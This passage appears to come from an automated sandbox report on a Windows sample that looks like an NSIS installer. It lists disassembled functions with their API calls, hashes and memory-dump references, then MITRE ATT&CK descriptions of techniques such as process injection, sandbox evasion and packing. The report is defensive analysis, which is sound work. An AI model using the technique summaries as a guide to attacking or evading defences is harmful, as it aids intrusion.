Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 764c70fbd70d8432b47cb810857664527778e1a3b62db9879bd3831654477798
Instruction ID: e514ae104980ccf078864521baf36738fde3649283c018ed360e76dc3c34fc32
Opcode Fuzzy Hash: 764c70fbd70d8432b47cb810857664527778e1a3b62db9879bd3831654477798
Instruction Fuzzy Hash: 13F0FFB2A04115BFDB01EBA4DD88DAFBBBCEB44301B044476F605F2191C6749D018B79

Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C

Strings

!, xrefs: 00401C40

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 756893ed4847bb0bd72a5117efa2a57ba430928b3e2712cee879890b773371fc
Instruction ID: 91203bd525acade81736f390ad8a27fd027b74ba1091a33c19100adfebe27d64
Opcode Fuzzy Hash: 756893ed4847bb0bd72a5117efa2a57ba430928b3e2712cee879890b773371fc
Instruction Fuzzy Hash: 6C218E71E44209BEEB159FA5D946AAD7BB0EB84304F14803EF505F61D1DA788A408F28

Function 004059B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405F2F: lstrcpynA.KERNEL32(?,?,00000400,0040328D,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F3C

Part of subcall function 00405960: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,?,004059CC,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,76233410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040596E
Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405973
Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405987

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb129A.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,76233410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A08
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb129A.tmp,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,76233410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76233410,C:\Users\user\AppData\Local\Temp\), ref: 00405A18

Strings

C:\Users\user\AppData\Local\Temp\nsb129A.tmp, xrefs: 004059BB, 004059C0, 004059C6, 00405A01, 00405A07, 00405A0F, 00405A17
C:\Users\user\AppData\Local\Temp\, xrefs: 004059B5

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb129A.tmp
API String ID: 3248276644-3826209409
Opcode ID: 1798501a893aa51cf33724b967df125bb5b79cc73e901e6a487cbcc52799f4ac
Instruction ID: 1994e1ad2c5e9883225bba15f0e05bd5e2410f9dbe362fa4db8952c1f9a8588a
Opcode Fuzzy Hash: 1798501a893aa51cf33724b967df125bb5b79cc73e901e6a487cbcc52799f4ac
Instruction Fuzzy Hash: B3F04CB6205D5296C622333A1C066EF2A55CE86334719463FF891B13D2DB3C8913DD7E

Function 004058C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031A8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004058CD
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031A8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004058D6
lstrcatA.KERNEL32(?,00409014,?,00000006,00000008,0000000A), ref: 004058E7

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004058C7

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3936084776
Opcode ID: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
Instruction ID: 8ecb161afe92f8f98ec5c140421c9a6f3833b5d00e23c8f539a5f8bbe46d8a58
Opcode Fuzzy Hash: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
Instruction Fuzzy Hash: B0D0A962A05D302BD20273159C05E8F2A0CCF12740B0400B2F200B22E2C63C4D428FFE

Function 00402BB4 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
RegCloseKey.ADVAPI32(?), ref: 00402C22
RegCloseKey.ADVAPI32(?), ref: 00402C43

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 92a6906e664bbcb47ab1ca28fdd4f13aa4067a21e5a0486ffc58b8f5881c376e
Instruction ID: 05bed6b59ed8188e40eca3efb14264cb36eb805b2849730c7d7757a09cb5f5a9
Opcode Fuzzy Hash: 92a6906e664bbcb47ab1ca28fdd4f13aa4067a21e5a0486ffc58b8f5881c376e
Instruction Fuzzy Hash: BC115B32504119FBEF01AF51CE09B9E7B7AEF14351F104072BA05B50E0E7B5EE52AA68

Function 00405960 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,?,004059CC,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,76233410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040596E
CharNextA.USER32(00000000), ref: 00405973
CharNextA.USER32(00000000), ref: 00405987

Strings

C:\Users\user\AppData\Local\Temp\nsb129A.tmp, xrefs: 00405961

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsb129A.tmp
API String ID: 3213498283-531241618
Opcode ID: 78caeea6086e6eed9a212387893711d8897386d9b52ffe3bd3d136e2934aa6d1
Instruction ID: 9bd73c2178bbc4ada55c293d8cea80d9ef0b2d457d60247f238fee92507865f8
Opcode Fuzzy Hash: 78caeea6086e6eed9a212387893711d8897386d9b52ffe3bd3d136e2934aa6d1
Instruction Fuzzy Hash: CDF096D1904F60AEFB3252684C44B779F89CB56771F18447BE940B62C1C27C48418FEB

Function 00402CE4 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402EC4,00000001), ref: 00402CF7
GetTickCount.KERNEL32 ref: 00402D15
CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D32
ShowWindow.USER32(00000000,00000005), ref: 00402D40

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: f4337ae7c9a0c2b393fe5f11cb57febad8f5df9eb2ad2e71e21657c922240b80
Instruction ID: 46e63a0393c595c386a212d898ebec3da19c13aa57c3e66a4565427f31a4a510
Opcode Fuzzy Hash: f4337ae7c9a0c2b393fe5f11cb57febad8f5df9eb2ad2e71e21657c922240b80
Instruction Fuzzy Hash: 09F05E70906221ABDA207F20BE4CACA7BA4FB45B527024576F445B11E4C779888ACBDD

Function 00404FCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404FF9
CallWindowProcA.USER32(?,?,?,?), ref: 0040504A

Part of subcall function 0040403C: SendMessageA.USER32(000103D4,00000000,00000000,00000000), ref: 0040404E

Strings

, xrefs: 00404FDA

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: e712e2a543f08d2e54f60ba561f502afcf318598cb166087ec4cd0ddecdd3944
Instruction ID: a223dd13e6372a4dd0479c59c93eb21e0d8a99a0ac54a5c20384062b78d82a0f
Opcode Fuzzy Hash: e712e2a543f08d2e54f60ba561f502afcf318598cb166087ec4cd0ddecdd3944
Instruction Fuzzy Hash: F1017171104609EBEF205F51DD81A9F3A29EB84795F204037FA01B62D1D77A8C51AAAE

Function 004036EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,76233410,00000000,C:\Users\user\AppData\Local\Temp\,004036C2,004034DC,?,?,00000006,00000008,0000000A), ref: 00403704
GlobalFree.KERNEL32(00000000), ref: 0040370B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004036EA

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3936084776
Opcode ID: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
Instruction ID: b677e6ccb62fb367f72670c3ce7c034f3dd0af87a7da7d41c05298a088c6e355
Opcode Fuzzy Hash: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
Instruction Fuzzy Hash: C6E01233815121ABC7356F5BED04B5A77687F45B22F058466EC407B3A0CB746C418FD9

Function 0040590E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\vq6jxdGvD6.exe,C:\Users\user\Desktop\vq6jxdGvD6.exe,80000000,00000003), ref: 00405914
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\vq6jxdGvD6.exe,C:\Users\user\Desktop\vq6jxdGvD6.exe,80000000,00000003), ref: 00405922

Strings

C:\Users\user\Desktop, xrefs: 0040590E

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3125694417
Opcode ID: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
Instruction ID: 79756b3271e31ddeb9bc27b600d1c90533e2d507c88bbc01e3e6e8e0ac64b055
Opcode Fuzzy Hash: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
Instruction Fuzzy Hash: 1BD0C7B2419D706EE34373559C04B9F6A49DF56750F0904A2E140A61D1C67C5D414BAD

Function 00405A2D Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A3D
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A55
CharNextA.USER32(00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A66
lstrlenA.KERNEL32(00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A6F

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
Instruction ID: 6224e523b18aba5be362eaca93d7d04149ef311f73b073555fcbd801f46ec3cb
Opcode Fuzzy Hash: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
Instruction Fuzzy Hash: 68F0C232604458AFC712DBA4CC40D9EBBA8EF46350B2541A5E800F7251D234EE019FA9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
